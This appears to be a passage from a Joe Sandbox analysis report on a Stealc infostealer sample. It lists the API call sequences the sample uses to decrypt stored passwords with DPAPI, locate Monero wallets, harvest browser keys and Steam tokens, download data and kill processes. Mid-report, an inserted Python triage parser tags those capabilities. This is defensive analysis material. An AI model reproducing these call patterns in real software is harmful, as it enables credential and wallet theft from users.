                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: f0216665feaa68fb5bdc623bfb228ab6b21b71497b33d2e20bf4a6415ea97f89
                                • Instruction ID: cb948683ed0744c66fa5ce79fc239dc5c2b1f8fb1fb1f7951aaddc41e49a84b7
                                • Opcode Fuzzy Hash: f0216665feaa68fb5bdc623bfb228ab6b21b71497b33d2e20bf4a6415ea97f89
                                • Instruction Fuzzy Hash: F9518F79901A02AFDF16DF69D868A6BB7A8FF05700F164514AD06DB284EF30ED61CBD0
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00397805
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0039784A
                                • StrStrA.SHLWAPI(?,Password), ref: 003978B8
                                  • Part of subcall function 00397750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0039775E
                                  • Part of subcall function 00397750: RtlAllocateHeap.NTDLL(00000000), ref: 00397765
                                  • Part of subcall function 00397750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0039778D
                                  • Part of subcall function 00397750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003977AD
                                  • Part of subcall function 00397750: LocalFree.KERNEL32(?), ref: 003977B7
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003978EC
                                • HeapFree.KERNEL32(00000000), ref: 003978F3
                                • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00397A35
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                • String ID: Password
                                • API String ID: 356768136-3434357891
                                • Opcode ID: 4c89c188936cfdb1437e3e372b0048079055acc26142cb7a398ec81f50adcc9b
                                • Instruction ID: ccf71dcd39af53a5733c99adeaba91fa83724b066f4d5f3b1566f21ecb5ee354
                                • Opcode Fuzzy Hash: 4c89c188936cfdb1437e3e372b0048079055acc26142cb7a398ec81f50adcc9b
                                • Instruction Fuzzy Hash: 3E712FB1D0021DAFDF11DF95CC81AEEBBB8EF45300F1445A9E509E7240EB319A89CB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00391135
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0039113C
                                • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00391159
                                • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00391173
                                • RegCloseKey.ADVAPI32(?), ref: 0039117D
                                Strings
                                • SOFTWARE\monero-project\monero-core, xrefs: 0039114F
                                • wallet_path, xrefs: 0039116D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                • API String ID: 3225020163-4244082812
                                • Opcode ID: f732bd9383a1491bbf74d2ff9d0b774c7f78a9c5a3b1031964e2597f883e4b3b
                                • Instruction ID: fcfe0044d8c5aee3840d2ee4a6069c6eb20c3597b629a60ff7ce0a44b6f8d188
                                • Opcode Fuzzy Hash: f732bd9383a1491bbf74d2ff9d0b774c7f78a9c5a3b1031964e2597f883e4b3b
                                • Instruction Fuzzy Hash: E3F03075640309BFD7109BE49C4DFEA7B7CEB14715F100159FE05E2281E6B05A58A7A0
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 00399E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 00399E42
                                • LocalAlloc.KERNEL32(00000040), ref: 00399EA7
                                  • Part of subcall function 003B71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003B71FE
                                • lstrcpy.KERNEL32(00000000,003C4C48), ref: 00399FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: daf558d58bed2bc816006fb04a73893da0665030ad1b0014245ed095a50cd32b
                                • Instruction ID: 203313e890f2c9a76368c5c4621bbde38b21516570a238d4caf870b693cab5d5
                                • Opcode Fuzzy Hash: daf558d58bed2bc816006fb04a73893da0665030ad1b0014245ed095a50cd32b
                                • Instruction Fuzzy Hash: ED51B032A11209ABCF12EF68DC85BDEB7A8EF54315F154029F90AEF251DB70ED158B90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0039565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00395661
                                • InternetOpenA.WININET(003BCFEC,00000000,00000000,00000000,00000000), ref: 00395677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00395692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003956BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 003956E1
                                • InternetCloseHandle.WININET(?), ref: 003956FA
                                • InternetCloseHandle.WININET(00000000), ref: 00395701
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 04db98aa8fe2b76d1d4dae00b674b77ba9cb4460117d18d358fe318034cac97e
                                • Instruction ID: 3dfac3ada738dc2fa6e0e1f9b78ebfd7383e7072fa611155aea628f865ae6aad
                                • Opcode Fuzzy Hash: 04db98aa8fe2b76d1d4dae00b674b77ba9cb4460117d18d358fe318034cac97e
                                • Instruction Fuzzy Hash: 3C41A270A00605EFDB16CF95DC88FAAB7B5FF48305F1580A9E908DB290D7719985CF94
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003B4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 003B4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B47AB
                                • CloseHandle.KERNEL32(00000000), ref: 003B47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 003B47C0
                                • CloseHandle.KERNEL32(00000000), ref: 003B47CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 978d51692302a1dc455b9a2700f3312f1f7306c53fcd37be16d0e05a2d74b6f8
                                • Instruction ID: 80dce8281f8c0c6b1710fe96f41c51a0ddaf7cb3a69d45f04ac5b62587822172
                                • Opcode Fuzzy Hash: 978d51692302a1dc455b9a2700f3312f1f7306c53fcd37be16d0e05a2d74b6f8
                                • Instruction Fuzzy Hash: FF01B571601618AFE7215B609C8EFFA77BCEB58755F0101C4FA05E1182EF74CD88DAA4
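                                The API sequences listed for the function blocks above read as a capability map of the sample: a registry walk with a "Password" substring check feeding CryptUnprotectData (003977D0 and its subcall 00397750, DPAPI-protected secrets in HKEY_CURRENT_USER), the SOFTWARE\monero-project\monero-core wallet_path lookup (00391135), a WinINet fetch into a heap buffer (0039565A), and a Toolhelp32 walk that opens each process with access 0x1 (PROCESS_TERMINATE) and terminates it (003B4759). The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in this report's "APIs" format and tags each function with the capability its call set implies. The sample text is constructed from lines copied above; the tag names, the rule set and the heuristic that folds the A/W suffix of Win32 API names are my own choices, not anything Joe Sandbox defines.

```python
"""Turn the 'APIs' listings of a Joe Sandbox function dump into capability tags.

Added example for triaging reports like this one; it is not Joe Sandbox code.
The parser expects one '• Api.MODULE(args), ref: ADDR' line per call, with a
'Part of subcall function X:' prefix for calls made by an inlined callee.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: a few API lines copied from the function blocks in the report.
SAMPLE_REPORT = """\
APIs
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00397805
• RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0039784A
• StrStrA.SHLWAPI(?,Password), ref: 003978B8
  • Part of subcall function 00397750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0039778D
APIs
• RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\\monero-project\\monero-core,00000000,00020119,?), ref: 00391159
• RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00391173
APIs
• InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00395692
• InternetReadFile.WININET(?,?,00000400,00000001), ref: 003956BC
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003B4759
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B479C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 003B47AB
• wsprintfA.USER32 ref: 00397B10
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"            # Api.MODULE
    r"(?:\((?P<args>.*)\))?"                 # optional (arg,arg,...); greedy to the last ')'
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
HKEY_NAMES = {"80000001": "HKEY_CURRENT_USER", "80000002": "HKEY_LOCAL_MACHINE"}
PROCESS_TERMINATE = 0x1


@dataclass
class ApiCall:
    api: str                 # name with the A/W suffix folded, e.g. RegOpenKeyEx
    module: str
    args: list[str]
    ref: str | None
    subcall_of: str | None   # address of the inlined callee, if any


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)

    @property
    def api_names(self) -> set[str]:
        return {c.api for c in self.calls}

    @property
    def ref(self) -> str | None:
        direct = [c.ref for c in self.calls if c.subcall_of is None and c.ref]
        return direct[0] if direct else None


def normalize(api: str) -> str:
    """Heuristic (assumption): fold ANSI/Unicode pairs, RegOpenKeyExA -> RegOpenKeyEx."""
    if len(api) > 2 and api[-1] in "AW" and not api[-2].isupper():
        return api[:-1]
    return api


def hex_arg(value: str) -> int | None:
    """Report arguments are hex or '?' when the sandbox could not resolve them."""
    try:
        return int(value, 16)
    except ValueError:
        return None


def parse_report(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    for line in text.splitlines():
        if line.strip() == "APIs":           # each 'APIs' header starts a new function
            blocks.append(FunctionBlock())
            continue
        m = LINE_RE.match(line)
        if not m or not blocks:              # dump-source / hash lines are ignored
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        blocks[-1].calls.append(ApiCall(normalize(m.group("api")), m.group("mod"),
                                        args, m.group("ref"), m.group("sub")))
    return blocks


def tag_block(block: FunctionBlock) -> list[str]:
    names = block.api_names
    tags: list[str] = []
    # Registry enumeration whose values are fed to DPAPI: stored-credential harvesting.
    if {"RegEnumValue", "CryptUnprotectData"} <= names:
        hives = {HKEY_NAMES.get(c.args[0], c.args[0])
                 for c in block.calls if c.api == "RegOpenKeyEx" and c.args}
        tags.append("registry_dpapi_credential_harvest:" + ",".join(sorted(hives)))
    # Key or value names that point at a cryptocurrency wallet product.
    if any(re.search(r"wallet|monero", a, re.I) for c in block.calls for a in c.args):
        tags.append("crypto_wallet_discovery")
    if {"InternetOpenUrl", "InternetReadFile"} <= names:
        tags.append("wininet_download")
    # Toolhelp walk + OpenProcess + TerminateProcess: kills processes by name.
    if {"CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"} <= names:
        access = [hex_arg(c.args[0]) for c in block.calls if c.api == "OpenProcess" and c.args]
        wants_kill = any(a is not None and a & PROCESS_TERMINATE for a in access)
        tags.append("process_kill_loop" + (":PROCESS_TERMINATE" if wants_kill else ""))
    return tags


def triage(text: str) -> list[dict]:
    """One record per function block: entry ref, folded API names, capability tags."""
    return [{"ref": b.ref, "apis": sorted(b.api_names), "tags": tag_block(b)}
            for b in parse_report(text)]


if __name__ == "__main__":
    for rec in triage(SAMPLE_REPORT):
        print(rec["ref"], rec["tags"])
```

                                Feeding the whole report through triage() gives a per-function capability list that is easier to diff against other Stealc builds than fuzzy hashes are; the rules above are deliberately conjunctive (all APIs of a pattern must be present in one function) so that a lone RegOpenKeyEx or OpenProcess does not raise a tag.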
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 003A8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A846C
                                • lstrlen.KERNEL32(00000000), ref: 003A84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A84E9
                                • lstrlen.KERNEL32(00000000), ref: 003A84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003A852E
                                • StrCmpCA.SHLWAPI(00000000,003C4C3C), ref: 003A853E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                • Associated: 00000000.00000002.2325048970.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325073043.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325256322.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000840000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325274343.0000000000882000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325550913.0000000000883000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325675684.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2325694941.0000000000A20000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_390000_file.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B292C
                                • RegOpenKeyExA.ADVAPI32(80000002,00F6B760,00000000,00020119,003B28A9), ref: 003B294B
                                • RegQueryValueExA.ADVAPI32(003B28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003B2965
                                • RegCloseKey.ADVAPI32(003B28A9), ref: 003B296F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2325073043.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003B289C
                                  • Part of subcall function 003B2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 003B2925
                                  • Part of subcall function 003B2910: RtlAllocateHeap.NTDLL(00000000), ref: 003B292C
                                  • Part of subcall function 003B2910: RegOpenKeyExA.ADVAPI32(80000002,00F6B760,00000000,00020119,003B28A9), ref: 003B294B
                                  • Part of subcall function 003B2910: RegQueryValueExA.ADVAPI32(003B28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 003B2965
                                  • Part of subcall function 003B2910: RegCloseKey.ADVAPI32(003B28A9), ref: 003B296F
                                • RegOpenKeyExA.ADVAPI32(80000002,00F6B760,00000000,00020119,003A9500), ref: 003B28D1
                                • RegQueryValueExA.ADVAPI32(003A9500,00F7F358,00000000,00000000,00000000,000000FF), ref: 003B28EC
                                • RegCloseKey.ADVAPI32(003A9500), ref: 003B28F6
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 0039723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00397279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00397280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 003972C3
                                • HeapFree.KERNEL32(00000000), ref: 003972CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00397329
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00399CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00399CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00399D03
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003AEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 003AEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 003AEA61
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AEA7A
                                • lstrcat.KERNEL32(?,00F78B28), ref: 003AEA8D
                                • lstrcat.KERNEL32(?,003C1794), ref: 003AEA9F
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                APIs
                                • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AECDF
                                • lstrlen.KERNEL32(00000000), ref: 003AECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 003AED1D
                                • lstrlen.KERNEL32(00000000), ref: 003AED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 003AED52
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0039140E), ref: 00399A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0039140E), ref: 00399AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,0039140E), ref: 00399AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,0039140E,00000000,?,?,?,0039140E), ref: 00399AE0
                                • LocalFree.KERNEL32(?,?,?,?,0039140E), ref: 00399B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,0039140E), ref: 00399B07
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 003B5B14
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA188
                                  • Part of subcall function 003BA173: std::exception::exception.LIBCMT ref: 003BA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 003B5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 003B5B89
